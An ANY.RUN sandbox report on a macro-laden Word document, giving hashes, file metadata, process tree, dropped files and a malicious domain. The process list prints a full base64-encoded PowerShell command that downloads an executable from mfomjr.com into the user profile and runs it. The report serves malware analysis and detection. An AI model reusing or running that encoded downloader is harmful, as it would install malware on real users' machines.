analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

info_23.05.doc

Full analysis: https://app.any.run/tasks/a7d17117-98c2-4cfb-98fd-4e58a34283cd
Verdict: Malicious activity
Analysis date: May 24, 2019, 12:33:07
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Title: Uzbekistan Sum, Subject: national, Author: Colt Bruen, Comments: Frozen, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 23 05:11:00 2019, Last Saved Time/Date: Thu May 23 05:11:00 2019, Number of Pages: 1, Number of Words: 15, Number of Characters: 89, Security: 0
MD5:

88DBEB1C0ECFC288A5ACA3885047F45E

SHA1:

E7D4D1E920EA56161F7E245DEFDE8F084F6F73EB

SHA256:

C1E1ED23A686334F018700246A61CC922496CE68FF4E0FED8D9A412E337ED88F

SSDEEP:

1536:Q6p6qy8GDBTb5VnUvWMyDoTITDH3eIKJKYD+viErrHo8GV7arq7s1T+a9yR:Q6p6qy8GDBTb5VUvVy6ITzpODzLZRPR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 3512)

    • Executed via WMI

      • powershell.exe (PID: 3512)

    • Starts Microsoft Office Application

      • rundll32.exe (PID: 3552)

    • Creates files in the user directory

      • powershell.exe (PID: 3512)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3376)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3376)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.flo | iGrafx FlowCharter document (36.2)
.doc | Microsoft Word document (34.5)
.doc | Microsoft Word document (old ver.) (20.5)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Dickens
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 103
Paragraphs: 1
Lines: 1
Company: Konopelski - Cummings
CodePage: Windows Cyrillic
Security: None
Characters: 89
Words: 15
Pages: 1
ModifyDate: 2019:05:23 04:11:00
CreateDate: 2019:05:23 04:11:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: Frozen
Keywords: -
Author: Colt Bruen
Subject: national
Title: Uzbekistan Sum
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
3
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start rundll32.exe no specs winword.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3552"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\info_23.05.doc.floC:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3376"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\info_23.05.doc.flo"C:\Program Files\Microsoft Office\Office14\WINWORD.EXErundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3512powershell -nop -e JABMAEEAMABtAEkATgBzAD0AJwBwAFAATQB3AF8AMABiAEMAJwA7ACQAQgBtAGkAcQBaAGgAIAA9ACAAJwA3ADAAMAAnADsAJABxAGEAYQBIAHMAOQBHAHoAPQAnAHQAWgAxAHQAaQBDAGwAJwA7ACQAVABOADkAZAB1AHQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEIAbQBpAHEAWgBoACsAJwAuAGUAeABlACcAOwAkAEkAagA1AGgAOABpAGsAUAA9ACcAQwBvAHMANgB2AGoAdwAnADsAJABBAEUAdwBfAEQAegA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAZQBjAHQAJwApACAATgBlAHQALgBXAGAAZQBiAGAAQwBMAEkAYABlAE4AVAA7ACQAcwBpAEEASQBZAFEAPQAnAGgAdAB0AHAAOgAvAC8AbQBmAG8AbQBqAHIALgBjAG8AbQAvAGwAZQBnAG8AdQAvADMAcgBlAHQAeQB4AG8AMgBtAC4AcABoAHAAPwBsAD0AcwBwAGkAawBkADYALgB3AGEAcAAnAC4AUwBQAGwAaQB0ACgAJwBAACcAKQA7ACQAdgBLAEgANgBTAFMANgAyAD0AJwBaADgAMQBtAHYAYwAnADsAZgBvAHIAZQBhAGMAaAAoACQAdwBhAEgAcwBDAGsAIABpAG4AIAAkAHMAaQBBAEkAWQBRACkAewB0AHIAeQB7ACQAQQBFAHcAXwBEAHoALgBEAE8AVwBuAGwATwBhAGQAZgBpAEwAZQAoACQAdwBhAEgAcwBDAGsALAAgACQAVABOADkAZAB1AHQAKQA7ACQAdQBpAG8ASQB0AEUASwB0AD0AJwBaAEYASgByAGQAdQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAFQATgA5AGQAdQB0ACkALgBsAEUATgBHAHQASAAgAC0AZwBlACAAMwAwADMAMgA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAFQAKAAkAFQATgA5AGQAdQB0ACkAOwAkAGYAbQBPAEMAbwBOAD0AJwBqAE4AQgA5AGQAYgBvACcAOwBiAHIAZQBhAGsAOwAkAEwAdwBjAEMAdQBqAD0AJwBTAFIANwB3AGQARwBHADAAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUABwAGMAXwA2AGkAagBpAD0AJwBMAEIAbwBmAHoAVwBqAHUAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 992
Read events
1 438
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
9

Dropped files

PID
Process
Filename
Type
3376WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR698B.tmp.cvr
MD5:
SHA256:
3512powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1BLI9FXL8A8XIEQ6UR5J.temp
MD5:
SHA256:
3376WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFAB135047CAFAED07.TMP
MD5:
SHA256:
3376WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{724A7071-CD0C-4CCC-9570-5104A8B83D59}.tmp
MD5:
SHA256:
3376WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{805D23C7-FAE7-48EC-9A28-E86B2FC83B79}.tmp
MD5:
SHA256:
3376WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:01323F148C83A32CF5452750422767CC
SHA256:B1B516E8510F694E6E20DC3D77472DB209A4A66544B86C1CF49373F8D14D5B65
3376WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\846C6923.wmfwmf
MD5:296715247637B5E0E4A13E77B3498960
SHA256:3A97E1D74255C9908669B079A11F031C1A7998D456AEC1290E7A10F33502F0F5
3376WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:28F8559CAF37AFB65EC1D85F6E9E7AE3
SHA256:E9637B527B04FA20CD73057872B770065D751256F09FC9BEDCCCA97CA5CF4AF5
3512powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
3376WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F6F328E7.wmfwmf
MD5:1D5B7ECF314806E22CFBA40108614D54
SHA256:D803A25B2CC0B61A357E57D6B820229A5735D3C00D7D49D6435D86585626926E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
4
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
mfomjr.com
malicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
info_23.05.doc